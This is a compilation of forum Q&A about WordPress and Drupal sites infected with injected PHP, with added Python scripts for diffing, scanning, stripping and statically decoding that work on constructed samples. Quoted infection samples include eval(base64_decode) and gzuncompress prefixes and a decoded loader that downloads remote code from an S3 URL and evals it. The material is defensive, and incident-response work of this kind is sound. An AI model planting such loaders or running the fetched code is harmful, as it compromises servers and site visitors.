I have a hosting account with one main application written in Laravel 4, and several sub-domain sites, mostly made with WordPress.
For the last few days I have had a big problem: every PHP file on my hosting, regardless of its location, gets altered by some code being added at the beginning.
Has anyone had this kind of problem? I guess it comes from WordPress being hacked, but is there a way to localize it to that specific WordPress site?
It's somewhat rare for WordPress itself to be 'hacked'. More likely, a poorly written or compromised plugin or theme has been used.
Themes can also use scripts which can have very dangerous security flaws in them. One such example is TimThumb, which was part of many legitimate themes, but contained a security hole which allows an attacker to write to any files owned by the same user on the server. More here: http://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/
My advice:
Update WordPress
Update all plugins
Remove any unnecessary plugins and only use ones from larger vendors (JetPack can often replace many other plugins, but you know it will be safe and secure as it's built by Automattic, the creators of WordPress)
Change your FTP password
Change your admin password
I have faced a similar situation before. There are many plugins to protect a website from code injection techniques.
Here is a plugin for WP to stay safe from many of the attacks:
https://wordpress.org/plugins/bulletproof-security/
You can read more about how to prevent code injection on your website here.
PS: Sorry if I misunderstood your question.
I am working on a WordPress site that is getting infected by malware every x weeks, but we can't find what is causing the issue. Some background information:
The website is on a separate development domain that is password protected. During the development we've updated the software when updates were available. What happens is that after a random number of weeks we get redirected to spam sites when we try to access the website. The website itself becomes really slow at the first visit, after that the speed is reasonable again. We only have 1 admin account and a few editors working on the website to transfer the content. So only a handful of trusted people have access to the site.
Our hosting company screens/scans for malware, but that seems to be too late to prevent the cause.
We only have a handful of plugins installed that all seem legit. A list below:
Classic Editor
Collapsible Categories in the Dashboard (this plugin isn't used by many so could be a risk?)
Gutenberg
Justified Image Grid
Reveal IDs
tagDiv Cloud Library
tagDiv Composer
tagDiv Social Counter
tagDiv Standard Pack
Wordpress Importer
Yoast SEO
All the plugins and WordPress itself are updated to their latest available version all the time.
We've installed the tagDiv Newspaper theme version 10.0, but had the issues with previous versions as well. On each re-install of the WordPress site we've deleted all files and the whole database AND asked the hosting company to double check for files that we missed. We have other sites running on the same server without any problem, so the problem seems to limit itself to the dev/wordpress site. During each clean up we've reset all relevant passwords (database, ftp). tagDiv Newspaper themes seem to have been a target multiple times for malware injection, so that is a red flag. Unfortunately so much work has already been done that changing the theme would be problematic, plus I am not 100% sure it's the theme that is causing the issues.
After infection all *.php files have this extra php code at the top of each .php file:
<?php /*8968665*/ error_reporting(0); #ini_set('error_log',NULL); #ini_set('log_errors',0); #ini_set('display_errors','Off'); #eval( base64_decode('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')); #ini_restore('error_log'); #ini_restore('display_errors'); /*8968665*/ ?><?php
As far as I could tell the database seems to be untouched.
In the root of the website the directory pl is created with filenames PayPAl2019.zip and many subfolders which seem to handle some sort of payments. IP references in files that I could find point to ip : ^64.106.213.* which belong to DataPipe, Inc.
Files that are created in the root of the WordPress directory are 588eqpn7.php, u9hwrd7d.php and shell.php . This last file is recognized as a trojan by any virusscanner: Trojan:Script/Casur.A!cl.
Some of the date stamps of the files are weird too. E.g. 2018, but the development site did not exist back then?
I have limited ssh access to the server, but no permission to execute some of the needed commands to dig deeper.
The questions I have are:
How to find out what is causing the infection of this WordPress site?
How to restore the website without losing too much work? Since it didn't help to delete everything the first couple of times.
It's difficult to get a feeling for what exactly is going on from just what you're telling us. Depending on the password protection and your setup, some scenarios are more likely than others. If you use e.g. a basic authentication module from Apache, the attackers would have to bypass this or have access through other means (another hosting account on the same machine, which might be a hint at wrongly set permissions, or the hoster was compromised, etc.). If there is an application-level password protection (e.g. via WordPress) it might not prevent access to certain resources which are vulnerable.
The "re-infection" you describe might be due to a persistent backdoor (or an unpatched vulnerable component), so this is not easy to tell either.
Generally, if I did a forensic analysis of the installation I would start with the randomly named files and see when and with what kind of parameters they were accessed. From there I would get a hint at what the attackers did and maybe have a rough idea of the timeframe of the initial compromise. That way it would be easy to restore to a known-good backup without losing too much time.
In such a scenario it makes sense to a) rebuild the infrastructure (or application in this case) or, if available, b) restore from a known-good backup. It's very alarming how many hosters do not have a working backup, or have an insufficient one, and how many customers choose a low price over (data) security.
To save time you could download a copy of the installation and rebuild a quick and dirty installation in a separate folder, then diff the two folders against each other and find the differences (these might be either from the attacker or manually configured / developed). It's an economic question of how much time you want to invest to rebuild how much of the installation. If you spend too little time and the attackers return, you're out of luck.
... also, do your backups.
I got a website in Wordpress and recently we discovered that it was infected by several malware scripts that insert scripts using the common base64 and eval functions like this:
We were able to solve most of the infected files but there are still some scripts being injected into the index.html, like these:
All these scripts marked in red make requests to sites that immediately trigger my computer's antivirus.
So question here is, how can I track which file loads these lines? How can I know which file prints them? I can't just search for the string since the code is encrypted like on the first image...
The truth is, it's probably going to be more than one file, and/or it's going to be something hidden deep in a plugin/upload folder.
This is going to be a bit time-consuming, but these are generally the steps I follow when fixing a hacked site to narrow things down and make sure I got all the crap out:
1) Before you do anything else, make sure you have a backup of both the files and db. That way, if you accidentally delete something, it's easy to restore.
2) Delete any unused themes or plugins, and make sure all existing plugins are up-to-date.
3) Update WordPress to the current version. Seriously. Keeping up-to-date is important. If you're more than two major releases behind, you'll want to update incrementally. (https://codex.wordpress.org/Upgrading_WordPress_-_Extended_Instructions)
4) After you've updated, connect via FTP and look for files older than when you updated. Look for extra files that shouldn't be there--this can be tricky, because hacked files are usually named things like wp-shortcode-s.php. I usually have a copy of WP core files open in a window beside my FTP client as a reference.
5) Check the first few lines of code on php and js files in your plugins folder for malicious code. Again, you might want to have a freshly downloaded copy of the plugin to compare files to.
6) Check the uploads folder and subfolders for malicious files.
I also keep checking my hacked site here to see how I'm doing:
http://isithacked.com/
And when you're finished, you might want to read up on how to harden WP to make it more difficult to hack.
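The comparison in steps 4 to 6 of the answer above (extra files, altered core or plugin files, scripts under uploads) can be scripted instead of eyeballed in an FTP client. The following is an added example, not the answer's own tooling: it hashes a live tree and a freshly downloaded reference tree, then reports files present only on the live side, files whose content differs, and script files inside `wp-content/uploads`. Both trees here are constructed samples built in a temporary directory; `wp-config.php` is treated as per-site and excluded, and the uploads folder is excluded from the "extra" list because it legitimately holds files the reference does not have.

```python
"""Diff a live WordPress tree against a clean reference copy (constructed sample data)."""
import hashlib
import os
import shutil
import tempfile

UPLOADS = os.path.join("wp-content", "uploads")
SCRIPT_EXTS = (".php", ".phtml", ".phar")
# Files that legitimately differ per install; never reported as extra or modified.
PER_SITE = {"wp-config.php", ".htaccess"}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_digests(root):
    """Map relative path -> sha256 for every regular file under root."""
    digests = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root)] = sha256_of(full)
    return digests


def compare_trees(live, reference):
    """Return extra / modified / missing files plus any script files under uploads."""
    live_d, ref_d = tree_digests(live), tree_digests(reference)
    in_uploads = lambda p: p.startswith(UPLOADS + os.sep)
    extra = sorted(p for p in live_d
                   if p not in ref_d and p not in PER_SITE and not in_uploads(p))
    modified = sorted(p for p in live_d
                      if p in ref_d and p not in PER_SITE and live_d[p] != ref_d[p])
    missing = sorted(p for p in ref_d if p not in live_d)
    uploads_scripts = sorted(p for p in live_d
                             if in_uploads(p) and p.lower().endswith(SCRIPT_EXTS))
    return {"extra": extra, "modified": modified,
            "missing": missing, "uploads_scripts": uploads_scripts}


def _write(root, rel, content):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(content)


def build_samples(base):
    """Constructed sample trees: a clean reference and a live copy with typical damage."""
    ref, live = os.path.join(base, "reference"), os.path.join(base, "live")
    core = {
        "index.php": "<?php require 'wp-blog-header.php';\n",
        os.path.join("wp-includes", "functions.php"): "<?php // core helpers\n",
        os.path.join("wp-content", "plugins", "demo", "demo.php"): "<?php // plugin\n",
    }
    for rel, body in core.items():
        _write(ref, rel, body)
        _write(live, rel, body)
    _write(live, "wp-config.php", "<?php define('DB_NAME', 'site');\n")
    # Constructed damage: injected prefix on a core file, a dropped file with a
    # core-looking name, and a PHP file hidden among uploads.
    _write(live, os.path.join("wp-includes", "functions.php"),
           "<?php /*constructed*/ ?>" + core[os.path.join("wp-includes", "functions.php")])
    _write(live, "wp-shortcode-s.php", "<?php // constructed dropped file\n")
    _write(live, os.path.join(UPLOADS, "2019", "shell.php"), "<?php // constructed\n")
    _write(live, os.path.join(UPLOADS, "2019", "photo.jpg"), "not really a jpeg")
    return live, ref


def demo():
    base = tempfile.mkdtemp(prefix="wpdiff-")
    try:
        live, ref = build_samples(base)
        return compare_trees(live, ref)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(key, paths)
```

For a real site, point `compare_trees` at the live document root and at an unpacked copy of the same WordPress release plus the same plugin and theme versions; anything in `extra` or `modified` outside your own customisations deserves a look, and `uploads_scripts` should normally be empty.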
Depending on the source of the malware, it's hard to give you a precise hint. There are a few more in-depth walk-throughs about the topic you can find on Google; here are some good examples which could help:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
Also, if you are on a shared host, the issue could potentially be coming from another compromised user. Hopefully you have a clean version of the site so that moving to another host (and upgrading) is an option.
I'm using a WordPress blog; today I got a comment like this.
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
When I decoded this comment using a decoder I got
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
I'm getting many comments like this. Can anyone help me to resolve this problem? Is it a hack, or does it show the beginning of hacking?
It is a hack, or at least an attempt. They are taking advantage of an unresolved wordpress vulnerability that can allow them to download and execute code, among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these types of code snippets around your server side then please do more research to determine if you are truly infected and, if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual wordpress site admins either allowing via ignorance or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web, so you will likely have to do a good bit of research to be sure your site is OK. To help you research I'll clarify the terminology of this hack.
This is a PHP Code Injection attack that is most likely attempting to exploit a known vulnerability in the wordpress framework. It is using Base64 encoded PHP code to inject itself onto your hosting server via eval(), which is a programming language construct that is present in nearly all programming languages, including PHP. Hackers with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised wordpress sites, so be extremely careful when handling this type of problem.
None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.
We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.
We ended up writing a little python script to traverse our filesystem and detect the malicious code.
Here's the code for anyone interested (NOTE: USE AT OWN RISK):
https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
# finds all infected files, will not do anything but READ
python -m eval_scrubber find .
# attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
That script will scan the filesystem for malicious content and, as a separate command, it will attempt to remove the base64 eval functions.
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
Once we found the generator of the virus, we did one more eval_scrubber remove and then our problem was fixed.
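The answer above points out the weak spot of a naive scanner: PHP comments placed between `eval`, `(` and `base64_decode` defeat a literal string match. The following is an added example, not eval_scrubber or any other project's code, of a scanner that tolerates that noise and strips the injected `<?php ... ?>` prefix described in the earlier question (the `/*8968665*/ ... ?><?php` shape) while keeping a `.bak` copy. The files it scans are constructed here in a temporary directory; the base64 payload inside them is a harmless constructed string, not a captured one.

```python
"""Find and strip the eval(base64_decode(...)) prefix injected at the top of PHP files.

Constructed sample files only; not the tooling of any project mentioned on this page.
"""
import base64
import os
import re
import shutil
import tempfile

# Whitespace or PHP comments that may be wedged between tokens to evade simple greps.
_NOISE = rb"(?:\s|/\*.*?\*/|#[^\n]*\n|//[^\n]*\n)*"

# eval( base64_decode(  or  eval( gzuncompress( base64_decode(  with noise allowed.
INJECT_RE = re.compile(
    rb"\beval" + _NOISE + rb"\(" + _NOISE
    + rb"(?:gzuncompress" + _NOISE + rb"\(" + _NOISE + rb")?"
    + rb"base64_decode" + _NOISE + rb"\(",
    re.DOTALL,
)

# Injected prefix shape: a complete <?php ... ?> block at offset 0 immediately
# followed by the original file's own <?php opening tag.
PREFIX_RE = re.compile(rb"\A<\?php\b.*?\?>(?=\s*<\?php)", re.DOTALL)

HEAD_BYTES = 8192  # the injection sits at the top, so the head of the file is enough


def is_infected(head):
    """True if the given bytes contain the eval/base64 marker (comment noise tolerated)."""
    return INJECT_RE.search(head) is not None


def find_infected(root):
    """Walk root and return sorted relative paths of .php files whose head matches."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(HEAD_BYTES)
            if is_infected(head):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def strip_prefix(data):
    """Return (cleaned_bytes, removed). Only a marker-carrying block at offset 0 is removed,
    so a legitimate file that merely calls base64_decode further down is left untouched."""
    m = PREFIX_RE.match(data)
    if m and is_infected(m.group(0)):
        return data[m.end():].lstrip(), True
    return data, False


def clean_file(path, backup_suffix=".bak"):
    """Strip the prefix in place after copying the original to path + backup_suffix."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, removed = strip_prefix(data)
    if removed:
        shutil.copy2(path, path + backup_suffix)
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return removed


ORIGINAL = b"<?php\n// original plugin code\necho 'hello';\n"


def build_sample_tree(root):
    """Write constructed samples: two infected variants and one clean file."""
    payload = base64.b64encode(b'echo "constructed sample";')
    # Variant 1: the shape from the question (marker comments, # noise, then eval).
    injected = (
        b"<?php /*8968665*/ error_reporting(0); #ini_set('display_errors','Off');\n"
        b"eval( base64_decode('" + payload + b"')); /*8968665*/ ?>"
    )
    # Variant 2: comments between tokens so 'eval(base64_decode(' never appears literally.
    noisy = b"<?php eval/*a*/(/*b*/gzuncompress/*c*/(base64_decode('" + payload + b"'))); ?>"
    os.makedirs(os.path.join(root, "wp-content", "plugins"), exist_ok=True)
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(injected + ORIGINAL)
    with open(os.path.join(root, "wp-content", "plugins", "noisy.php"), "wb") as fh:
        fh.write(noisy + ORIGINAL)
    with open(os.path.join(root, "wp-content", "clean.php"), "wb") as fh:
        fh.write(ORIGINAL + b"$x = base64_decode($y); // legitimate use, no eval\n")


def demo():
    """Scan, clean, rescan; returns (hits_before, hits_after, restored index.php bytes)."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    try:
        build_sample_tree(root)
        before = find_infected(root)
        for rel in before:
            clean_file(os.path.join(root, rel))
        after = find_infected(root)
        with open(os.path.join(root, "index.php"), "rb") as fh:
            return before, after, fh.read()
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

Run `find_infected` first and review the list before calling `clean_file`; the cleaner only removes a prefix block that carries the marker, so a file with the injection somewhere other than offset 0 is reported but left for manual inspection. As the answer says, cleaning alone does not stop re-infection: the writer of these prefixes has to be found (file-change auditing on one known-infected file, as it describes) and the entry point closed.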
I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once.
Threat scan plugin
BUT
There was an index file with 2 short lines of code. Those 2 lines were injecting eval over and over. I forgot which index.php it was, but look in the folders:
wp-admin
wp-content
wp-include
Try to search for md5 in your files using Dreamweaver.
Hope you'll be able to fix it.
We've been having some troubles with cracked sites lately.
We've found several files on our sites (which are on a shared hosting platform) that don't belong there. These files are usually .txt or image files (it was a .js file once) that then get included in existing php files, effectively running them on the server.
The php code is something like this:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU...
Well it really just goes on from there.
From what I understand so far, the above code opens some kind of shell.
We also have sites that are infected who have links to various porn/advertising sites added to the bottom of the page. Although I don't think it's the same code (as the snippet above) that adds these links to the page. I have yet to find the source of these alterations.
Most of these attacks occur on Drupal sites, some of them are upgraded to the latest version of everything (modules + core) and still show signs of attacks.
The attacks aren't limited to Drupal sites, however; there are normal php sites that were cracked as well.
I know the first step would be to check the server logs, I've requested them but I do not have them yet.
I was wondering if anyone could give me some pointers as to what I should look for or what the next "obvious" steps to take are. (I've already changed the db and ftp passwords).
I have used the following snippet to track down some of the files:
grep -nRH --exclude=*.js 'eval(' *
I also ran that piece of code without excluding javascript files and I've deleted all of the attacker's files I could find.
I'd be happy to provide any additional information that could help solve this issue.
EDIT: the source code of the files:
<?php eval(gzuncompress(base64_decode('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'))); ?><?php eval(gzuncompress(base64_decode('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'))); ?><?php eval(gzuncompress(base64_decode('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'))); ?>
First of all, you need to know two things:
This may not be your fault. If it's a shared host, the hacker may have compromised any of the other thousand websites on the host, rooted the server, and then attacked your site from within.
Having said that, it may be your fault, so don't relax. Still look for holes.
But, besides looking at the logs, look for vulnerabilities within the sites. Does the site accept user-submitted content? If so, are there file uploads? If so, do you check the file for MIME type or just extension?
Another thing is RFI and LFI hacks. These vulnerabilities allow hackers to inject shells into your site, effectively making them administrators with complete file access. Look for these vulnerabilities.
If you can post the code in the .txt files, I'd be happy to "decipher" it for you.
If I can think of anything else, I'll add it on.
Edit 1
So, essentially the hacker used base64 and gzcompress to "obfuscate" the code. He then executes the uncompressed code with the eval() function. So, essentially, you can see the first layer of code by removing the eval() function and running the code. Unfortunately, under the first layer, there's another layer which I'm looking at.
In addition, since you say Drupal.... you may be using addons or plugins. Drupal may be secure, but those addons or plugins may not be. Do any of them handle form uploads or files in any way?
Edit 2
First Layer (Submitted by OP).
Second Layer (Initial gzuncompress and base64_decode()).
Still working on it...
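The layer-by-layer unwrapping described in the answer above (remove `eval()`, decode, find another layer underneath) and the staged loader from the earlier comment-spam question can both be done statically, without ever running the decoded PHP. The following is an added example, not the answerer's or the poster's tooling: it captures the wrapper chain around a base64 literal, applies the equivalent Python decoders innermost-first, repeats until no `eval(...)` wrapper remains, and pulls out any URLs the final layer would fetch. It goes slightly beyond the page by also handling `gzinflate` (PHP's raw-deflate counterpart to `gzuncompress`). The sample payload is constructed here around a placeholder domain, not taken from a real infection.

```python
"""Statically peel eval(base64_decode(...)) / eval(gzuncompress(base64_decode(...))) layers.

Constructed sample only; nothing decoded here is executed.
"""
import base64
import re
import zlib

# PHP decoder name -> equivalent transform on bytes (assumed mapping, see lead-in).
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzuncompress": lambda b: zlib.decompress(b),     # zlib-wrapped, what gzcompress() emits
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw deflate, what gzdeflate() emits
}

# eval( f1( f2( ... 'BASE64' : group 1 is the wrapper chain, group 2 the literal.
LAYER_RE = re.compile(r"eval\s*\(\s*((?:\w+\s*\(\s*)+)['\"]([A-Za-z0-9+/=]+)['\"]")


def peel_once(code):
    """Return the next-inner layer as text, or None if no eval(...) wrapper is present."""
    m = LAYER_RE.search(code)
    if m is None:
        return None
    chain = re.findall(r"\w+", m.group(1))
    data = m.group(2).encode("ascii")
    for name in reversed(chain):  # the innermost decoder is applied first
        if name not in DECODERS:
            raise ValueError("unsupported wrapper: " + name)
        data = DECODERS[name](data)
    return data.decode("utf-8", errors="replace")


def peel_all(code, max_layers=10):
    """Return every layer from the outer text down to the first one with no eval wrapper."""
    layers = [code]
    while len(layers) <= max_layers:
        nxt = peel_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def remote_urls(code):
    """URLs a decoded stage would contact; useful for blocking and log searches."""
    return re.findall(r"https?://[^\s\"'()<>]+", code)


def build_sample():
    """Constructed three-layer payload: comment-hidden base64 -> gzuncompress -> loader."""
    inner = ('$data = file_get_contents("https://example.invalid/update-framework.txt");'
             'eval($data);')
    middle = "eval(gzuncompress(base64_decode('%s')));" % base64.b64encode(
        zlib.compress(inner.encode())).decode()
    outer = '<!-- --> eval(base64_decode("%s")); --><!--/mfunc-->' % base64.b64encode(
        middle.encode()).decode()
    return outer


if __name__ == "__main__":
    layers = peel_all(build_sample())
    for i, layer in enumerate(layers):
        print(f"layer {i}: {layer[:70]}")
    print("fetches:", remote_urls(layers[-1]))
```

A layer that ends in `eval($data)` after a `file_get_contents` call, as in this sample, is a downloader: the code that actually runs lives on the remote host, so the static peel stops there and the URL is the indicator worth recording.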
I know that being open source does not necessarily make a program more/less secure than closed source (let's assume this neutrality, to keep flames out of this post). Fact is: since the source code is open, everybody knows your default URLs, default administrator logins, etc.
I'm using Wordpress and Joomla in some projects of my clients, and I always try to create some kind of additional security. Excluding always updating your files to latest version, what do you usually do to add more security in this scenario? Some of my thoughts:
I always change the "admin" name when applicable;
I would prefer not to explicitly say which technologies I'm using, but since I want to promote the CMS (I think that is the minimum I should do), I just don't say the exact version, so attackers don't know which exact vulnerabilities they can attack (WordPress automatically creates a meta tag in the HTML saying "Wordpress 2.8.4", for example);
Set correct permissions on directories, and bash scripts on my server that run every day at 0h setting 755 on directories I may have changed to 775 during the day and forgot to change back;
When applicable, I set the Apache configuration to limit IPs.
What else should I try to do? What "out of the box" solutions do you usually do to your installations?
Using something like the mod_security or mod_evasive Apache modules can be an idea too -- I suppose they require some configuration, though; and you should test that your website still works OK before using those on your production server.
As they are Apache modules, it also requires that you can install new Apache modules -- which means you have to be admin of the server.
On a pure PHP level, there is a tool called PHP-IDS; quoting its website:
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user’s session.
I suppose you could "plug" it in front of the CMS you are using, by adding a couple of lines to its entry point -- if there is a common entry point you can identify, or some file that's included once at the beginning of each page.
There is a "How to use it in my application?" entry in the FAQ.
And, like you said, securing your server is nice: no remote SQL access, for instance; checking the privileges of each user on the system, too; keeping your software up to date, ...
If you're super paranoid, you could set up the application in a sandbox and have Apache proxy over to it. But that's pretty much overkill unless you have a lot of sensitive data and/or are truly paranoid and/or have been broken into before.
If the application allows it, changing the admin path is generally a good idea too. For example, it's pretty easy with a search-and-replace to change WordPress's default admin path from /wp-admin to something else entirely (like /my-admin, for example). This isn't always possible though.
You'll also want to thoroughly check any user roles and permissions that can be set within the application itself. For example, Drupal has a pretty robust user access system. But you need to make sure you don't give any users access they don't
Other things include disabling, or deleting, any modules/extensions/plugins that are not 100% necessary to the operation of the system. Personally, I check all MySQL users to make sure no one can connect to the server remotely. You can also set up a chroot jail for all users on the server (except root, of course) so they're locked into a directory and can't get out of it.
See Hardening Wordpress and Hardening Wordpress with htaccess at the wordpress.org codex.
In Wordpress, put this
function remove_header_info() {
    // Stop wp_head() from printing the <meta name="generator"> tag that carries the version
    remove_action('wp_head', 'wp_generator');
}
add_action('init', 'remove_header_info');
in the theme's functions.php file to remove the WP version from being output by wp_head in header.php.
In Joomla, I would change the database prefix to something different from jos_.
I've found two interesting links that add information about WordPress.
The first one is from the WordPress blog itself, saying that you should always keep your installation up to date with all the security fixes.
The second one is a great list of many steps (from configuration to plugins) that I believe is really well written and has a lot of interesting advice (it's divided into two parts).